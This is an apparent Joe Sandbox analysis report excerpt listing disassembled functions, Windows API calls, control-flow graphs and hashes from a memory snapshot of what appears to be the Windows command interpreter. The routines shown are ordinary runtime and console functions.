                                              control_flow_graph 1171 7ff6eb188d80-7ff6eb188da2 1172 7ff6eb188da4-7ff6eb188daf 1171->1172 1173 7ff6eb188db1-7ff6eb188db4 1172->1173 1174 7ff6eb188dcc 1172->1174 1175 7ff6eb188dbf-7ff6eb188dca Sleep 1173->1175 1176 7ff6eb188db6-7ff6eb188dbd 1173->1176 1177 7ff6eb188dd1-7ff6eb188dd9 1174->1177 1175->1172 1176->1177 1178 7ff6eb188de7-7ff6eb188def 1177->1178 1179 7ff6eb188ddb-7ff6eb188de5 _amsg_exit 1177->1179 1180 7ff6eb188df1-7ff6eb188e0a 1178->1180 1181 7ff6eb188e46 1178->1181 1182 7ff6eb188e4c-7ff6eb188e54 1179->1182 1183 7ff6eb188e0e-7ff6eb188e11 1180->1183 1181->1182 1184 7ff6eb188e73-7ff6eb188e75 1182->1184 1185 7ff6eb188e56-7ff6eb188e69 _initterm 1182->1185 1186 7ff6eb188e13-7ff6eb188e15 1183->1186 1187 7ff6eb188e38-7ff6eb188e3a 1183->1187 1188 7ff6eb188e80-7ff6eb188e88 1184->1188 1189 7ff6eb188e77-7ff6eb188e79 1184->1189 1185->1184 1192 7ff6eb188e17-7ff6eb188e1b 1186->1192 1193 7ff6eb188e3c-7ff6eb188e41 1186->1193 1187->1182 1187->1193 1190 7ff6eb188eb4-7ff6eb188ec8 call 7ff6eb1837d8 1188->1190 1191 7ff6eb188e8a-7ff6eb188e98 call 7ff6eb1894f0 1188->1191 1189->1188 1200 7ff6eb188ecd-7ff6eb188eda 1190->1200 1191->1190 1201 7ff6eb188e9a-7ff6eb188eaa 1191->1201 1195 7ff6eb188e2d-7ff6eb188e36 1192->1195 1196 7ff6eb188e1d-7ff6eb188e29 1192->1196 1198 7ff6eb188f28-7ff6eb188f3d 1193->1198 1195->1183 1196->1195 1203 7ff6eb188ee4-7ff6eb188eeb 1200->1203 1204 7ff6eb188edc-7ff6eb188ede exit 1200->1204 1201->1190 1205 7ff6eb188ef9 1203->1205 1206 7ff6eb188eed-7ff6eb188ef3 _cexit 1203->1206 1204->1203 1205->1198 1206->1205
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                              • String ID:
                                              • API String ID: 4291973834-0
                                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction ID: 76bf44009fe9e2fb4cc2733bea975e69954c37ffccd4f1ba3cfff9aa3c8e56b4
                                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction Fuzzy Hash: 1141D433A08A4286FA519B14E9403F962A1BF5C3ACF144436D95DD76B0DF7EF8488B4A
                                              Function 00007FF6EB184A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1207 7ff6eb184a14-7ff6eb184a3e GetEnvironmentStringsW 1208 7ff6eb184a40-7ff6eb184a46 1207->1208 1209 7ff6eb184aae-7ff6eb184ac5 1207->1209 1210 7ff6eb184a59-7ff6eb184a8f GetProcessHeap HeapAlloc 1208->1210 1211 7ff6eb184a48-7ff6eb184a52 1208->1211 1213 7ff6eb184a91-7ff6eb184a9a memmove 1210->1213 1214 7ff6eb184a9f-7ff6eb184aa9 FreeEnvironmentStringsW 1210->1214 1211->1211 1212 7ff6eb184a54-7ff6eb184a57 1211->1212 1212->1210 1212->1211 1213->1214 1214->1209
                                              APIs
                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                              • memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                              • String ID:
                                              • API String ID: 1623332820-0
                                              • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                              • Instruction ID: ad2bcc90e8e790f2d32cf5a61511d648a10f10c70b0c068c2a0bee35ec17fb20
                                              • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                              • Instruction Fuzzy Hash: 9D11C123A1474282DE109B42B0042B9BBA0FB8DFA8F598038DE0F47764DF3EE4448744
                                              Function 00007FF6EB185CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                              • String ID:
                                              • API String ID: 1826527819-0
                                              • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction ID: 2c1011e39b368b54b8a1e02b15760bc81a958420aa797c5f63b6289728ab88df
                                              • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction Fuzzy Hash: 0E012D72908682CAE6045B55E4543F9BFA1FF8E769F446134D54F863B6CF3EA0488B0A
                                              Function 00007FF6EB183060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorMode$FullNamePathwcschr
                                              • String ID:
                                              • API String ID: 1464828906-0
                                              • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction ID: fbd2a206eaaf719d80f471f6709ac084bab68d0ec2737bd28430e12ca9d98d01
                                              • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction Fuzzy Hash: AD310963A0865182E6619F15B4003FEB761FB4EBA8F588134DA5DC33F0DE7EE845470A
                                              Function 00007FF6EB17CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                              • API String ID: 2221118986-3416068913
                                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction ID: 7c607c505e1544947bbf3d15b1450d4d1e7e793b8e440734624eaafa3656d340
                                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction Fuzzy Hash: 7A117322A0874281EB54CB55E1543F92390AF8DBF8F184231DD6D8B7F5EE2ED4808349
                                              Function 00007FF6EB17BE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcschr
                                              • String ID: 2$COMSPEC
                                              • API String ID: 1764819092-1738800741
                                              • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction ID: 2eca5134221dbfd6de1287d956ef0ede4780b2ac5ee2e77c0c46a4876acda717
                                              • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction Fuzzy Hash: 7A517123A0866285FB649B25D4613FA23919F4EBACF044031DA4DC73F5DFAEE544878B
                                              Function 00007FF6EB182EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                              • String ID:
                                              • API String ID: 4254246844-0
                                              • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                              • Instruction ID: af03ef898b14134bc329006e2ee32e4d55c6c8b57785a6c0249134ffdcca7f61
                                              • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                              • Instruction Fuzzy Hash: CA418323A0C74286EE219B00E5543F9B7A0FF8DBA8F484531D94EC77A5DF3EE445864A
                                              Function 00007FF6EB185A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleMode
                                              • String ID:
                                              • API String ID: 1591002910-0
                                              • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction ID: 52e85516d7e7b19469af8813d64f0e9a3dd2d8be7a46c06e0c4a29e14f5dedf7
                                              • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction Fuzzy Hash: AEF07A36A59642CBE6148B10F9953F97BA0FB8D729F454135C90E83338DF3EB4158B06
                                              Function 00007FF6EB18291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DriveType
                                              • String ID: :
                                              • API String ID: 338552980-336475711
                                              • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction ID: 3ba2c17f064935a308248ff5a329a261169b4fb7da43acfaa48617cc803b8a5b
                                              • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction Fuzzy Hash: 36E06D6762864086E7209B60E4511AAB7A0FB8D758F841525EA8D83734DF3CD249CF0D
                                              Function 00007FF6EB185AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • GetConsoleTitleW.KERNELBASE ref: 00007FF6EB185B52
                                                • Part of subcall function 00007FF6EB184224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184297
                                                • Part of subcall function 00007FF6EB184224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1842D7
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB1842FD
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB184368
                                                • Part of subcall function 00007FF6EB184224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184380
                                                • Part of subcall function 00007FF6EB184224: wcsrchr.MSVCRT ref: 00007FF6EB1843E6
                                                • Part of subcall function 00007FF6EB184224: lstrcmpW.KERNELBASE ref: 00007FF6EB184401
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6EB185BC7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                              • String ID:
                                              • API String ID: 346765439-0
                                              • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction ID: 535165e24c0ab43adbcea4281f78fc8b897341e21a0f76b907346d9ae0a85b8d
                                              • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction Fuzzy Hash: BB31B522A0C64286FA20A711A4903FD6395FF8DBE8F445031E94EC7BB5DF3EE501870A
                                              Function 00007FF6EB189A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Concurrency::cancel_current_taskmalloc
                                              • String ID:
                                              • API String ID: 1412018758-0
                                              • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction ID: 50b66114867919fc727482d5108bdc2b52a4a2479dbcef179588dd518c8f75d6
                                              • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction Fuzzy Hash: E4E09213F1A70796FE152B6268413F812447F1C7A8F482430DD1DC93A2EE2EB195875A
                                              Function 00007FF6EB17CD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction ID: 2a64165f4bdbdffcbaa8c868504c75ad082d581b270d40ca8e82853bc3a3922d
                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction Fuzzy Hash: 37F03133A18642C6EB448B55F9902B8F7A1FB8DB54B589434D90E83364DF3DE485C705
                                              Function 00007FF6EB184C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: exit
                                              • String ID:
                                              • API String ID: 2483651598-0
                                              • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction ID: f1933bb0ff546ae3d5cdf54de63c1469da23ffe4a15a48afbd0bcb51a24259db
                                              • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction Fuzzy Hash: 4BC0803270464687EB1C673135512BD55597F0D325F04543CC50BC12F1DF2DD4088609
                                              Function 00007FF6EB185508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6EB176F97), ref: 00007FF6EB18550C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: DefaultLangUser
                                              • String ID:
                                              • API String ID: 768647712-0
                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction ID: 3fa9d2c147a3e2985a32abcfdb9587537ac3d7fc979011ad34423492a8e25a0c
                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction Fuzzy Hash: 52E012E3E082538AF5542A4164853F85953EB6F7B7FC44031C60D956E55D2F6841560E
                                              Function 00007FF6EB182E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
